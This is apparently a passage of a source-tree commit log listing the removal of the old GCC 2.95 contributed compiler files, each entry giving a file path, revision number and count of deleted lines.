src/contrib/gcc.295/Makefile.in (dead) 1.2 +0 -735 src/contrib/gcc.295/NEWS (dead) 1.2 +0 -1071 src/contrib/gcc.295/ONEWS (dead) 1.2 +0 -117 src/contrib/gcc.295/PROBLEMS (dead) 1.2 +0 -448 src/contrib/gcc.295/PROJECTS (dead) 1.2 +0 -26 src/contrib/gcc.295/README (dead) 1.2 +0 -144 src/contrib/gcc.295/README-bugs (dead) 1.2 +0 -9 src/contrib/gcc.295/README-fixinc (dead) 1.2 +0 -574 src/contrib/gcc.295/README.DWARF (dead) 1.2 +0 -55 src/contrib/gcc.295/README.TRAD (dead) 1.2 +0 -263 src/contrib/gcc.295/README.g77 (dead) 1.2 +0 -852 src/contrib/gcc.295/SERVICE (dead) 1.2 +0 -39 src/contrib/gcc.295/TESTS.FLUNK (dead) 1.2 +0 -79 src/contrib/gcc.295/acconfig.h (dead) 1.2 +0 -221 src/contrib/gcc.295/aclocal.m4 (dead) 1.2 +0 -1261 src/contrib/gcc.295/alias.c (dead) 1.2 +0 -163 src/contrib/gcc.295/ansidecl.h (dead) 1.2 +0 -54 src/contrib/gcc.295/assert.h (dead) 1.2 +0 -69 src/contrib/gcc.295/basic-block.h (dead) 1.2 +0 -642 src/contrib/gcc.295/bitmap.c (dead) 1.2 +0 -317 src/contrib/gcc.295/bitmap.h (dead) 1.2 +0 -32 src/contrib/gcc.295/build-make (dead) 1.2 +0 -644 src/contrib/gcc.295/c-aux-info.c (dead) 1.14 +0 -3413 src/contrib/gcc.295/c-common.c (dead) 1.2 +0 -96 src/contrib/gcc.295/c-convert.c (dead) 1.5 +0 -7463 src/contrib/gcc.295/c-decl.c (dead) 1.2 +0 -596 src/contrib/gcc.295/c-iterate.c (dead) 1.2 +0 -180 src/contrib/gcc.295/c-lang.c (dead) 1.2 +0 -2021 src/contrib/gcc.295/c-lex.c (dead) 1.2 +0 -80 src/contrib/gcc.295/c-lex.h (dead) 1.2 +0 -84 src/contrib/gcc.295/c-parse.gperf (dead) 1.2 +0 -2900 src/contrib/gcc.295/c-parse.in (dead) 1.2 +0 -168 src/contrib/gcc.295/c-pragma.c (dead) 1.2 +0 -46 src/contrib/gcc.295/c-pragma.h (dead) 1.6 +0 -557 src/contrib/gcc.295/c-tree.h (dead) 1.2 +0 -6602 src/contrib/gcc.295/c-typeck.c (dead) 1.2 +0 -770 src/contrib/gcc.295/caller-save.c (dead) 1.2 +0 -3203 src/contrib/gcc.295/calls.c (dead) 1.4 +0 -668 src/contrib/gcc.295/cccp.1 (dead) 1.10 +0 -11145 src/contrib/gcc.295/cccp.c (dead) 1.2 +0 -1047 src/contrib/gcc.295/cexp.y (dead) 1.4 +0 -207 src/contrib/gcc.295/choose-temp.c (dead) 1.2 +0 -3409 src/contrib/gcc.295/collect2.c (dead) 1.2 +0 -36 src/contrib/gcc.295/collect2.h (dead) 1.2 +0 -11103 src/contrib/gcc.295/combine.c (dead) 1.2 +0 -116 src/contrib/gcc.295/conditions.h (dead) 1.2 +0 -565 src/contrib/gcc.295/config.guess (dead) 1.2 +0 -202 src/contrib/gcc.295/config.in (dead) 1.2 +0 -867 src/contrib/gcc.295/config.sub (dead) 1.2 +0 -5 src/contrib/gcc.295/config/README (dead) 1.2 +0 -252 src/contrib/gcc.295/config/alpha/alpha-interix.h (dead) 1.3 +0 -5290 src/contrib/gcc.295/config/alpha/alpha.c (dead) 1.2 +0 -2088 src/contrib/gcc.295/config/alpha/alpha.h (dead) 1.2 +0 -3770 src/contrib/gcc.295/config/alpha/alpha.md (dead) 1.2 +0 -104 src/contrib/gcc.295/config/alpha/alpha32.h (dead) 1.2 +0 -33 src/contrib/gcc.295/config/alpha/config-nt.sed (dead) 1.4 +0 -196 src/contrib/gcc.295/config/alpha/crtbegin.asm (dead) 1.2 +0 -105 src/contrib/gcc.295/config/alpha/crtend.asm (dead) 1.7 +0 -557 src/contrib/gcc.295/config/alpha/elf.h (dead) 1.13 +0 -208 src/contrib/gcc.295/config/alpha/freebsd.h (dead) 1.2 +0 -325 src/contrib/gcc.295/config/alpha/lib1funcs.asm (dead) 1.2 +0 -36 src/contrib/gcc.295/config/alpha/linux-ecoff.h (dead) 1.2 +0 -47 src/contrib/gcc.295/config/alpha/linux-elf.h (dead) 1.2 +0 -44 src/contrib/gcc.295/config/alpha/linux.h (dead) 1.2 +0 -31 src/contrib/gcc.295/config/alpha/netbsd-elf.h (dead) 1.2 +0 -38 src/contrib/gcc.295/config/alpha/netbsd.h (dead) 1.2 +0 -126 src/contrib/gcc.295/config/alpha/openbsd.h (dead) 1.2 +0 -127 src/contrib/gcc.295/config/alpha/osf.h (dead) 1.2 +0 -31 src/contrib/gcc.295/config/alpha/osf12.h (dead) 1.2 +0 -30 src/contrib/gcc.295/config/alpha/osf2or3.h (dead) 1.2 +0 -9 src/contrib/gcc.295/config/alpha/t-crtbe (dead) 1.2 +0 -6 src/contrib/gcc.295/config/alpha/t-ieee (dead) 1.2 +0 -16 src/contrib/gcc.295/config/alpha/t-interix (dead) 1.2 +0 -6 src/contrib/gcc.295/config/alpha/t-vms (dead) 1.2 +0 -16 src/contrib/gcc.295/config/alpha/va_list.h (dead) 1.2 +0 -22 src/contrib/gcc.295/config/alpha/vms-tramp.asm (dead) 1.2 +0 -510 src/contrib/gcc.295/config/alpha/vms.h (dead) 1.2 +0 -51 src/contrib/gcc.295/config/alpha/vxworks.h (dead) 1.2 +0 -62 src/contrib/gcc.295/config/alpha/win-nt.h (dead) 1.2 +0 -1 src/contrib/gcc.295/config/alpha/x-alpha (dead) 1.2 +0 -45 src/contrib/gcc.295/config/alpha/xm-alpha-interix.h (dead) 1.2 +0 -78 src/contrib/gcc.295/config/alpha/xm-alpha.h (dead) 1.2 +0 -4 src/contrib/gcc.295/config/alpha/xm-freebsd.h (dead) 1.2 +0 -23 src/contrib/gcc.295/config/alpha/xm-openbsd.h (dead) 1.2 +0 -93 src/contrib/gcc.295/config/alpha/xm-vms.h (dead) 1.2 +0 -34 src/contrib/gcc.295/config/alpha/xm-winnt.h (dead) 1.2 +0 -88 src/contrib/gcc.295/config/aoutos.h (dead) 1.2 +0 -30 src/contrib/gcc.295/config/dbx.h (dead) 1.2 +0 -87 src/contrib/gcc.295/config/dbxcoff.h (dead) 1.2 +0 -109 src/contrib/gcc.295/config/dbxelf.h (dead) 1.2 +0 -704 src/contrib/gcc.295/config/elfos.h (dead) 1.2 +0 -96 src/contrib/gcc.295/config/float-i128.h (dead) 1.2 +0 -96 src/contrib/gcc.295/config/float-i32.h (dead) 1.2 +0 -104 src/contrib/gcc.295/config/float-i386.h (dead) 1.2 +0 -96 src/contrib/gcc.295/config/float-i64.h (dead) 1.2 +0 -97 src/contrib/gcc.295/config/float-m68k.h (dead) 1.2 +0 -130 src/contrib/gcc.295/config/float-sh.h (dead) 1.2 +0 -96 src/contrib/gcc.295/config/float-vax.h (dead) 1.2 +0 -1352 src/contrib/gcc.295/config/fp-bit.c (dead) 1.38 +0 -535 src/contrib/gcc.295/config/freebsd.h (dead) 1.2 +0 -30 src/contrib/gcc.295/config/gnu.h (dead) 1.2 +0 -96 src/contrib/gcc.295/config/gofast.h (dead) 1.2 +0 -81 src/contrib/gcc.295/config/i386/386bsd.h (dead) 1.2 +0 -69 src/contrib/gcc.295/config/i386/aix386.h (dead) 1.2 +0 -143 src/contrib/gcc.295/config/i386/aix386ng.h (dead) 1.2 +0 -106 src/contrib/gcc.295/config/i386/att.h (dead) 1.2 +0 -130 src/contrib/gcc.295/config/i386/bsd.h (dead) 1.2 +0 -18 src/contrib/gcc.295/config/i386/bsd386.h (dead) 1.2 +0 -38 src/contrib/gcc.295/config/i386/config-nt.sed (dead) 1.2 +0 -42 src/contrib/gcc.295/config/i386/crtdll.h (dead) 1.2 +0 -32 src/contrib/gcc.295/config/i386/cygwin.asm (dead) 1.2 +0 -525 src/contrib/gcc.295/config/i386/cygwin.h (dead) 1.2 +0 -190 src/contrib/gcc.295/config/i386/dgux.c (dead) 1.2 +0 -265 src/contrib/gcc.295/config/i386/dgux.h (dead) 1.2 +0 -41 src/contrib/gcc.295/config/i386/djgpp-rtems.h (dead) 1.2 +0 -161 src/contrib/gcc.295/config/i386/djgpp.h (dead) 1.2 +0 -250 src/contrib/gcc.295/config/i386/freebsd-aout.h (dead) 1.45 +0 -818 src/contrib/gcc.295/config/i386/freebsd.h (dead) 1.2 +0 -257 src/contrib/gcc.295/config/i386/freebsd.h.fixed (dead) 1.2 +0 -155 src/contrib/gcc.295/config/i386/gas.h (dead) 1.2 +0 -409 src/contrib/gcc.295/config/i386/gmon-sol2.c (dead) 1.2 +0 -20 src/contrib/gcc.295/config/i386/gnu.h (dead) 1.2 +0 -9 src/contrib/gcc.295/config/i386/gstabs.h (dead) 1.2 +0 -34 src/contrib/gcc.295/config/i386/i386-aout.h (dead) 1.2 +0 -97 src/contrib/gcc.295/config/i386/i386-coff.h (dead) 1.2 +0 -575 src/contrib/gcc.295/config/i386/i386-interix.h (dead) 1.8 +0 -5754 src/contrib/gcc.295/config/i386/i386.c (dead) 1.6 +0 -2812 src/contrib/gcc.295/config/i386/i386.h (dead) 1.10 +0 -8207 src/contrib/gcc.295/config/i386/i386.md (dead) 1.2 +0 -110 src/contrib/gcc.295/config/i386/interix.c (dead) 1.2 +0 -89 src/contrib/gcc.295/config/i386/isc.h (dead) 1.2 +0 -12 src/contrib/gcc.295/config/i386/isccoff.h (dead) 1.2 +0 -43 src/contrib/gcc.295/config/i386/iscdbx.h (dead) 1.2 +0 -76 src/contrib/gcc.295/config/i386/linux-aout.h (dead) 1.2 +0 -76 src/contrib/gcc.295/config/i386/linux-oldld.h (dead) 1.2 +0 -212 src/contrib/gcc.295/config/i386/linux.h (dead) 1.2 +0 -37 src/contrib/gcc.295/config/i386/lynx-ng.h (dead) 1.2 +0 -39 src/contrib/gcc.295/config/i386/lynx.h (dead) 1.2 +0 -20 src/contrib/gcc.295/config/i386/mach.h (dead) 1.2 +0 -95 src/contrib/gcc.295/config/i386/mingw32.h (dead) 1.2 +0 -34 src/contrib/gcc.295/config/i386/moss.h (dead) 1.2 +0 -80 src/contrib/gcc.295/config/i386/netbsd.h (dead) 1.2 +0 -226 src/contrib/gcc.295/config/i386/next.h (dead) 1.2 +0 -130 src/contrib/gcc.295/config/i386/openbsd.h (dead) 1.2 +0 -76 src/contrib/gcc.295/config/i386/os2.h (dead) 1.2 +0 -65 src/contrib/gcc.295/config/i386/osf1-ci.asm (dead) 1.2 +0 -46 src/contrib/gcc.295/config/i386/osf1-cn.asm (dead) 1.2 +0 -260 src/contrib/gcc.295/config/i386/osf1elf.h (dead) 1.2 +0 -7 src/contrib/gcc.295/config/i386/osf1elfgdb.h (dead) 1.2 +0 -79 src/contrib/gcc.295/config/i386/osfelf.h (dead) 1.2 +0 -923 src/contrib/gcc.295/config/i386/osfrose.h (dead) 1.2 +0 -98 src/contrib/gcc.295/config/i386/perform.h (dead) 1.2 +0 -247 src/contrib/gcc.295/config/i386/ptx4-i.h (dead) 1.2 +0 -34 src/contrib/gcc.295/config/i386/rtems.h (dead) 1.2 +0 -169 src/contrib/gcc.295/config/i386/rtemself.h (dead) 1.2 +0 -117 src/contrib/gcc.295/config/i386/sco.h (dead) 1.2 +0 -86 src/contrib/gcc.295/config/i386/sco4.h (dead) 1.2 +0 -81 src/contrib/gcc.295/config/i386/sco4dbx.h (dead) 1.2 +0 -957 src/contrib/gcc.295/config/i386/sco5.h (dead) 1.2 +0 -24 src/contrib/gcc.295/config/i386/sco5gas.h (dead) 1.2 +0 -92 src/contrib/gcc.295/config/i386/scodbx.h (dead) 1.2 +0 -46 src/contrib/gcc.295/config/i386/seq-gas.h (dead) 1.2 +0 -56 src/contrib/gcc.295/config/i386/seq-sysv3.h (dead) 1.2 +0 -8 src/contrib/gcc.295/config/i386/seq2-sysv3.h (dead) 1.2 +0 -152 src/contrib/gcc.295/config/i386/sequent.h (dead) 1.2 +0 -156 src/contrib/gcc.295/config/i386/sol2-c1.asm (dead) 1.2 +0 -51 src/contrib/gcc.295/config/i386/sol2-ci.asm (dead) 1.2 +0 -46 src/contrib/gcc.295/config/i386/sol2-cn.asm (dead) 1.2 +0 -160 src/contrib/gcc.295/config/i386/sol2-gc1.asm (dead) 1.2 +0 -91 src/contrib/gcc.295/config/i386/sol2.h (dead) 1.2 +0 -11 src/contrib/gcc.295/config/i386/sol2gas.h (dead) 1.2 +0 -83 src/contrib/gcc.295/config/i386/sun.h (dead) 1.2 +0 -143 src/contrib/gcc.295/config/i386/sun386.h (dead) 1.2 +0 -45 src/contrib/gcc.295/config/i386/svr3.ifile (dead) 1.2 +0 -97 src/contrib/gcc.295/config/i386/svr3dbx.h (dead) 1.2 +0 -305 src/contrib/gcc.295/config/i386/svr3gas.h (dead) 1.2 +0 -45 src/contrib/gcc.295/config/i386/svr3z.ifile (dead) 1.2 +0 -124 src/contrib/gcc.295/config/i386/sysv3.h (dead) 1.2 +0 -245 src/contrib/gcc.295/config/i386/sysv4.h (dead) 1.2 +0 -35 src/contrib/gcc.295/config/i386/sysv5.h (dead) 1.2 +0 -9 src/contrib/gcc.295/config/i386/t-crtpic (dead) 1.2 +0 -2 src/contrib/gcc.295/config/i386/t-crtstuff (dead) 1.2 +0 -16 src/contrib/gcc.295/config/i386/t-cygwin (dead) 1.2 +0 -4 src/contrib/gcc.295/config/i386/t-dgux (dead) 1.2 +0 -2 src/contrib/gcc.295/config/i386/t-djgpp (dead) 1.2 +0 -3 src/contrib/gcc.295/config/i386/t-i386bare (dead) 1.2 +0 -16 src/contrib/gcc.295/config/i386/t-interix (dead) 1.2 +0 -4 src/contrib/gcc.295/config/i386/t-mingw32 (dead) 1.2 +0 -9 src/contrib/gcc.295/config/i386/t-next (dead) 1.2 +0 -2 src/contrib/gcc.295/config/i386/t-osf (dead) 1.2 +0 -18 src/contrib/gcc.295/config/i386/t-osf1elf (dead) 1.2 +0 -20 src/contrib/gcc.295/config/i386/t-sco5 (dead) 1.2 +0 -20 src/contrib/gcc.295/config/i386/t-sco5gas (dead) 1.2 +0 -32 src/contrib/gcc.295/config/i386/t-sol2 (dead) 1.2 +0 -7 src/contrib/gcc.295/config/i386/t-svr3dbx (dead) 1.2 +0 -2 src/contrib/gcc.295/config/i386/t-udk (dead) 1.2 +0 -5 src/contrib/gcc.295/config/i386/t-uwin (dead) 1.2 +0 -2 src/contrib/gcc.295/config/i386/t-vsta (dead) 1.2 +0 -2 src/contrib/gcc.295/config/i386/t-winnt (dead) 1.2 +0 -30 src/contrib/gcc.295/config/i386/udk.h (dead) 1.2 +0 -148 src/contrib/gcc.295/config/i386/unix.h (dead) 1.2 +0 -32 src/contrib/gcc.295/config/i386/uwin.asm (dead) 1.2 +0 -93 src/contrib/gcc.295/config/i386/uwin.h (dead) 1.2 +0 -80 src/contrib/gcc.295/config/i386/v3gas.h (dead) 1.2 +0 -78 src/contrib/gcc.295/config/i386/vsta.h (dead) 1.2 +0 -23 src/contrib/gcc.295/config/i386/vxi386.h (dead) 1.2 +0 -152 src/contrib/gcc.295/config/i386/win-nt.h (dead) 1.2 +0 -280 src/contrib/gcc.295/config/i386/win32.h (dead) 1.2 +0 -60 src/contrib/gcc.295/config/i386/winnt.c (dead) 1.2 +0 -12 src/contrib/gcc.295/config/i386/x-aix (dead) 1.2 +0 -4 src/contrib/gcc.295/config/i386/x-cygwin (dead) 1.2 +0 -11 src/contrib/gcc.295/config/i386/x-dgux (dead) 1.2 +0 -24 src/contrib/gcc.295/config/i386/x-djgpp (dead) 1.2 +0 -3 src/contrib/gcc.295/config/i386/x-isc (dead) 1.2 +0 -4 src/contrib/gcc.295/config/i386/x-isc3 (dead) 1.2 +0 -34 src/contrib/gcc.295/config/i386/x-ncr3000 (dead) 1.2 +0 -3 src/contrib/gcc.295/config/i386/x-next (dead) 1.2 +0 -8 src/contrib/gcc.295/config/i386/x-osf1elf (dead) 1.2 +0 -31 src/contrib/gcc.295/config/i386/x-osfrose (dead) 1.2 +0 -7 src/contrib/gcc.295/config/i386/x-sco (dead) 1.2 +0 -10 src/contrib/gcc.295/config/i386/x-sco4 (dead) 1.2 +0 -10 src/contrib/gcc.295/config/i386/x-sco5 (dead) 1.2 +0 -1 src/contrib/gcc.295/config/i386/x-sysv3 (dead) 1.2 +0 -1 src/contrib/gcc.295/config/i386/x-vsta (dead) 1.2 +0 -37 src/contrib/gcc.295/config/i386/xm-aix.h (dead) 1.2 +0 -6 src/contrib/gcc.295/config/i386/xm-bsd386.h (dead) 1.2 +0 -58 src/contrib/gcc.295/config/i386/xm-cygwin.h (dead) 1.2 +0 -12 src/contrib/gcc.295/config/i386/xm-dgux.h (dead) 1.2 +0 -44 src/contrib/gcc.295/config/i386/xm-djgpp.h (dead) 1.2 +0 -20 src/contrib/gcc.295/config/i386/xm-dos.h (dead) 1.2 +0 -4 src/contrib/gcc.295/config/i386/xm-freebsd.h (dead) 1.2 +0 -5 src/contrib/gcc.295/config/i386/xm-gnu.h (dead) 1.2 +0 -34 src/contrib/gcc.295/config/i386/xm-i386-interix.h (dead) 1.2 +0 -43 src/contrib/gcc.295/config/i386/xm-i386.h (dead) 1.2 +0 -6 src/contrib/gcc.295/config/i386/xm-isc.h (dead) 1.2 +0 -24 src/contrib/gcc.295/config/i386/xm-linux.h (dead) 1.2 +0 -33 src/contrib/gcc.295/config/i386/xm-lynx.h (dead) 1.2 +0 -42 src/contrib/gcc.295/config/i386/xm-mingw32.h (dead) 1.2 +0 -5 src/contrib/gcc.295/config/i386/xm-next.h (dead) 1.2 +0 -23 src/contrib/gcc.295/config/i386/xm-openbsd.h (dead) 1.2 +0 -57 src/contrib/gcc.295/config/i386/xm-os2.h (dead) 1.2 +0 -32 src/contrib/gcc.295/config/i386/xm-osf.h (dead) 1.2 +0 -6 src/contrib/gcc.295/config/i386/xm-osf1elf.h (dead) 1.2 +0 -22 src/contrib/gcc.295/config/i386/xm-sco.h (dead) 1.2 +0 -7 src/contrib/gcc.295/config/i386/xm-sco5.h (dead) 1.2 +0 -27 src/contrib/gcc.295/config/i386/xm-sun.h (dead) 1.2 +0 -4 src/contrib/gcc.295/config/i386/xm-sysv3.h (dead) 1.2 +0 -16 src/contrib/gcc.295/config/i386/xm-sysv4.h (dead) 1.2 +0 -39 src/contrib/gcc.295/config/i386/xm-uwin.h (dead) 1.2 +0 -26 src/contrib/gcc.295/config/i386/xm-vsta.h (dead) 1.2 +0 -24 src/contrib/gcc.295/config/i386/xm-winnt.h (dead) 1.2 +0 -107 src/contrib/gcc.295/config/interix.h (dead) 1.2 +0 -35 src/contrib/gcc.295/config/libgloss.h (dead) 1.2 +0 -51 src/contrib/gcc.295/config/linux-aout.h (dead) 1.2 +0 -88 src/contrib/gcc.295/config/linux.h (dead) 1.2 +0 -118 src/contrib/gcc.295/config/lynx-ng.h (dead) 1.2 +0 -180 src/contrib/gcc.295/config/lynx.h (dead) 1.2 +0 -196 src/contrib/gcc.295/config/netbsd.h (dead) 1.2 +0 -84 src/contrib/gcc.295/config/nextstep.c (dead) 1.2 +0 -567 src/contrib/gcc.295/config/nextstep.h (dead) 1.2 +0 -65 src/contrib/gcc.295/config/nextstep21.h (dead) 1.2 +0 -302 src/contrib/gcc.295/config/openbsd.h (dead) 1.2 +0 -183 src/contrib/gcc.295/config/psos.h (dead) 1.2 +0 -859 src/contrib/gcc.295/config/ptx4.h (dead) 1.2 +0 -26 src/contrib/gcc.295/config/sparc/aout.h (dead) 1.2 +0 -7 src/contrib/gcc.295/config/sparc/bsd.h (dead) 1.2 +0 -42 src/contrib/gcc.295/config/sparc/elf.h (dead) 1.2 +0 -429 src/contrib/gcc.295/config/sparc/gmon-sol2.c (dead) 1.2 +0 -33 src/contrib/gcc.295/config/sparc/hal.h (dead) 1.2 +0 -784 src/contrib/gcc.295/config/sparc/lb1spc.asm (dead) 1.2 +0 -246 src/contrib/gcc.295/config/sparc/lb1spl.asm (dead) 1.2 +0 -130 src/contrib/gcc.295/config/sparc/linux-aout.h (dead) 1.2 +0 -259 src/contrib/gcc.295/config/sparc/linux.h (dead) 1.2 +0 -245 src/contrib/gcc.295/config/sparc/linux64.h (dead) 1.2 +0 -38 src/contrib/gcc.295/config/sparc/lite.h (dead) 1.2 +0 -113 src/contrib/gcc.295/config/sparc/litecoff.h (dead) 1.2 +0 -41 src/contrib/gcc.295/config/sparc/lynx-ng.h (dead) 1.2 +0 -53 src/contrib/gcc.295/config/sparc/lynx.h (dead) 1.2 +0 -46 src/contrib/gcc.295/config/sparc/netbsd.h (dead) 1.2 +0 -68 src/contrib/gcc.295/config/sparc/openbsd.h (dead) 1.2 +0 -184 src/contrib/gcc.295/config/sparc/pbd.h (dead) 1.2 +0 -35 src/contrib/gcc.295/config/sparc/rtems.h (dead) 1.2 +0 -86 src/contrib/gcc.295/config/sparc/sol2-c1.asm (dead) 1.2 +0 -60 src/contrib/gcc.295/config/sparc/sol2-ci.asm (dead) 1.2 +0 -54 src/contrib/gcc.295/config/sparc/sol2-cn.asm (dead) 1.2 +0 -88 src/contrib/gcc.295/config/sparc/sol2-g1.asm (dead) 1.2 +0 -363 src/contrib/gcc.295/config/sparc/sol2-sld-64.h (dead) 1.2 +0 -11 src/contrib/gcc.295/config/sparc/sol2-sld.h (dead) 1.2 +0 -232 src/contrib/gcc.295/config/sparc/sol2.h (dead) 1.2 +0 -38 src/contrib/gcc.295/config/sparc/sp64-aout.h (dead) 1.2 +0 -157 src/contrib/gcc.295/config/sparc/sp64-elf.h (dead) 1.2 +0 -6461 src/contrib/gcc.295/config/sparc/sparc.c (dead) 1.2 +0 -3287 src/contrib/gcc.295/config/sparc/sparc.h (dead) 1.2 +0 -6684 src/contrib/gcc.295/config/sparc/sparc.md (dead) 1.2 +0 -53 src/contrib/gcc.295/config/sparc/splet.h (dead) 1.2 +0 -27 src/contrib/gcc.295/config/sparc/sun4gas.h (dead) 1.2 +0 -29 src/contrib/gcc.295/config/sparc/sun4o3.h (dead) 1.2 +0 -49 src/contrib/gcc.295/config/sparc/sunos4.h (dead) 1.2 +0 -231 src/contrib/gcc.295/config/sparc/sysv4.h (dead) 1.2 +0 -39 src/contrib/gcc.295/config/sparc/t-elf (dead) 1.2 +0 -2 src/contrib/gcc.295/config/sparc/t-halos (dead) 1.2 +0 -21 src/contrib/gcc.295/config/sparc/t-linux64 (dead) 1.2 +0 -30 src/contrib/gcc.295/config/sparc/t-sol2 (dead) 1.2 +0 -8 src/contrib/gcc.295/config/sparc/t-sol2-64 (dead) 1.2 +0 -2 src/contrib/gcc.295/config/sparc/t-sp64 (dead) 1.2 +0 -26 src/contrib/gcc.295/config/sparc/t-sparcbare (dead) 1.2 +0 -24 src/contrib/gcc.295/config/sparc/t-sparclite (dead) 1.2 +0 -23 src/contrib/gcc.295/config/sparc/t-splet (dead) 1.2 +0 -7 src/contrib/gcc.295/config/sparc/t-sunos40 (dead) 1.2 +0 -16 src/contrib/gcc.295/config/sparc/t-sunos41 (dead) 1.2 +0 -17 src/contrib/gcc.295/config/sparc/t-vxsparc (dead) 1.2 +0 -131 src/contrib/gcc.295/config/sparc/vxsim.h (dead) 1.2 +0 -61 src/contrib/gcc.295/config/sparc/vxsparc.h (dead) 1.2 +0 -2 src/contrib/gcc.295/config/sparc/x-sysv4 (dead) 1.2 +0 -26 src/contrib/gcc.295/config/sparc/xm-linux.h (dead) 1.2 +0 -39 src/contrib/gcc.295/config/sparc/xm-lynx.h (dead) 1.2 +0 -23 src/contrib/gcc.295/config/sparc/xm-openbsd.h (dead) 1.2 +0 -10 src/contrib/gcc.295/config/sparc/xm-pbd.h (dead) 1.2 +0 -4 src/contrib/gcc.295/config/sparc/xm-sol2.h (dead) 1.2 +0 -25 src/contrib/gcc.295/config/sparc/xm-sp64.h (dead) 1.2 +0 -49 src/contrib/gcc.295/config/sparc/xm-sparc.h (dead) 1.2 +0 -27 src/contrib/gcc.295/config/sparc/xm-sysv4-64.h (dead) 1.2 +0 -48 src/contrib/gcc.295/config/sparc/xm-sysv4.h (dead) 1.2 +0 -385 src/contrib/gcc.295/config/svr3.h (dead) 1.2 +0 -887 src/contrib/gcc.295/config/svr4.h (dead) 1.2 +0 -5 src/contrib/gcc.295/config/t-freebsd (dead) 1.2 +0 -13 src/contrib/gcc.295/config/t-gnu (dead) 1.2 +0 -3 src/contrib/gcc.295/config/t-install-cpp (dead) 1.2 +0 -2 src/contrib/gcc.295/config/t-libc-ok (dead) 1.2 +0 -16 src/contrib/gcc.295/config/t-linux (dead) 1.2 +0 -11 src/contrib/gcc.295/config/t-linux-aout (dead) 1.2 +0 -2 src/contrib/gcc.295/config/t-linux-gnulibc1 (dead) 1.2 +0 -9 src/contrib/gcc.295/config/t-netbsd (dead) 1.2 +0 -9 src/contrib/gcc.295/config/t-openbsd (dead) 1.2 +0 -5 src/contrib/gcc.295/config/t-openbsd-thread (dead) 1.2 +0 -6 src/contrib/gcc.295/config/t-rtems (dead) 1.2 +0 -7 src/contrib/gcc.295/config/t-svr4 (dead) 1.2 +0 -4 src/contrib/gcc.295/config/tm-dwarf2.h (dead) 1.2 +0 -24 src/contrib/gcc.295/config/x-interix (dead) 1.2 +0 -14 src/contrib/gcc.295/config/x-linux (dead) 1.2 +0 -14 src/contrib/gcc.295/config/x-linux-aout (dead) 1.2 +0 -6 src/contrib/gcc.295/config/x-lynx (dead) 1.2 +0 -9 src/contrib/gcc.295/config/x-svr4 (dead) 1.2 +0 -4 src/contrib/gcc.295/config/xm-alloca.h (dead) 1.5 +0 -37 src/contrib/gcc.295/config/xm-freebsd.h (dead) 1.2 +0 -31 src/contrib/gcc.295/config/xm-gnu.h (dead) 1.2 +0 -77 src/contrib/gcc.295/config/xm-interix.h (dead) 1.2 +0 -40 src/contrib/gcc.295/config/xm-linux.h (dead) 1.2 +0 -51 src/contrib/gcc.295/config/xm-lynx.h (dead) 1.2 +0 -35 src/contrib/gcc.295/config/xm-openbsd.h (dead) 1.2 +0 -6 src/contrib/gcc.295/config/xm-siglist.h (dead) 1.2 +0 -34 src/contrib/gcc.295/config/xm-std32.h (dead) 1.2 +0 -33 src/contrib/gcc.295/config/xm-svr3.h (dead) 1.2 +0 -35 src/contrib/gcc.295/config/xm-svr4.h (dead) 1.12 +0 -9238 src/contrib/gcc.295/configure (dead) 1.2 +0 -77 src/contrib/gcc.295/configure.frag (dead) 1.2 +0 -3833 src/contrib/gcc.295/configure.in (dead) 1.2 +0 -233 src/contrib/gcc.295/configure.lang (dead) 1.2 +0 -472 src/contrib/gcc.295/convert.c (dead) 1.2 +0 -24 src/contrib/gcc.295/convert.h (dead) 1.2 +0 -9459 src/contrib/gcc.295/cp/ChangeLog (dead) 1.2 +0 -197 src/contrib/gcc.295/cp/Make-lang.in (dead) 1.2 +0 -265 src/contrib/gcc.295/cp/Makefile.in (dead) 1.2 +0 -226 src/contrib/gcc.295/cp/NEWS (dead) 1.2 +0 -2993 src/contrib/gcc.295/cp/call.c (dead) 1.2 +0 -5086 src/contrib/gcc.295/cp/class.c (dead) 1.2 +0 -35 src/contrib/gcc.295/cp/config-lang.in (dead) 1.2 +0 -240 src/contrib/gcc.295/cp/cp-tree.def (dead) 1.2 +0 -2496 src/contrib/gcc.295/cp/cp-tree.h (dead) 1.2 +0 -1820 src/contrib/gcc.295/cp/cvt.c (dead) 1.6 +0 -15167 src/contrib/gcc.295/cp/decl.c (dead) 1.2 +0 -59 src/contrib/gcc.295/cp/decl.h (dead) 1.4 +0 -5439 src/contrib/gcc.295/cp/decl2.c (dead) 1.2 +0 -230 src/contrib/gcc.295/cp/errfn.c (dead) 1.2 +0 -1482 src/contrib/gcc.295/cp/error.c (dead) 1.6 +0 -1163 src/contrib/gcc.295/cp/except.c (dead) 1.2 +0 -324 src/contrib/gcc.295/cp/exception.cc (dead) 1.2 +0 -372 src/contrib/gcc.295/cp/expr.c (dead) 1.2 +0 -484 src/contrib/gcc.295/cp/friend.c (dead) 1.2 +0 -674 src/contrib/gcc.295/cp/g++.1 (dead) 1.4 +0 -279 src/contrib/gcc.295/cp/g++spec.c (dead) 1.2 +0 -102 src/contrib/gcc.295/cp/gxx.gperf (dead) 1.6 +0 -2076 src/contrib/gcc.295/cp/gxxint.texi (dead) 1.2 +0 -43 src/contrib/gcc.295/cp/inc/exception (dead) 1.2 +0 -46 src/contrib/gcc.295/cp/inc/new (dead) 1.2 +0 -13 src/contrib/gcc.295/cp/inc/new.h (dead) 1.2 +0 -62 src/contrib/gcc.295/cp/inc/typeinfo (dead) 1.2 +0 -4180 src/contrib/gcc.295/cp/init.c (dead) 1.2 +0 -202 src/contrib/gcc.295/cp/input.c (dead) 1.2 +0 -107 src/contrib/gcc.295/cp/lang-options.h (dead) 1.2 +0 -59 src/contrib/gcc.295/cp/lang-specs.h (dead) 1.2 +0 -4717 src/contrib/gcc.295/cp/lex.c (dead) 1.2 +0 -135 src/contrib/gcc.295/cp/lex.h (dead) 1.2 +0 -2287 src/contrib/gcc.295/cp/method.c (dead) 1.2 +0 -11 src/contrib/gcc.295/cp/mpw-config.in (dead) 1.2 +0 -112 src/contrib/gcc.295/cp/mpw-make.sed (dead) 1.2 +0 -42 src/contrib/gcc.295/cp/new.cc (dead) 1.2 +0 -89 src/contrib/gcc.295/cp/new1.cc (dead) 1.2 +0 -80 src/contrib/gcc.295/cp/new2.cc (dead) 1.2 +0 -3906 src/contrib/gcc.295/cp/parse.y (dead) 1.2 +0 -2694 src/contrib/gcc.295/cp/pt.c (dead) 1.5 +0 -187 src/contrib/gcc.295/cp/ptree.c (dead) 1.2 +0 -409 src/contrib/gcc.295/cp/repo.c (dead) 1.2 +0 -1135 src/contrib/gcc.295/cp/rtti.c (dead) 1.2 +0 -3524 